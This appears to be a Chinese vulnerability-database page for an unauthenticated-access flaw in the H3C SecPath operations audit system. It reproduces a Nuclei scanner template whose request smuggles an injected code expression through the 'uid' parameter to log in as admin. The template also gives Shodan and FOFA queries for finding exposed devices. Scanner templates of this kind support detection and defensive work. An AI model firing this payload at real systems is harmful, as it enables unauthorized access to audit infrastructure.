unauthorized-h3csecparh-login: H3C Server - Unauthenticated Access

日期: 2025-08-01 | 影响软件: H3C Server | POC: 已公开

漏洞描述

H3C server was able to be accessed with no authentication requirements in place.

PoC代码[已公开]

id: unauthorized-h3csecparh-login

info:
  name: H3C Server - Unauthenticated Access
  author: ritikchaddha
  severity: high
  description: H3C server was able to be accessed with no authentication requirements in place.
  classification:
    cpe: cpe:2.3:h:h3c:secpath_f5060:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: h3c
    product: secpath_f5060
    shodan-query: http.html:"H3C-SecPath-运维审计系统"
    fofa-query: app="H3C-SecPath-运维审计系统" && body="2018"
  tags: h3c,default-login,unauth,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "admin"
          - "审计管理员"
          - "错误的id"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022043192796653f426968858547f264204ba35e7c76b6fa9eade85d211aca312a63022100fe83e26b40cdd4af9874fb1c0c3de8a0682e34d8cc0806f3e533781b7a727524:922c64590222798bb761d5b6d8e72950

相关漏洞推荐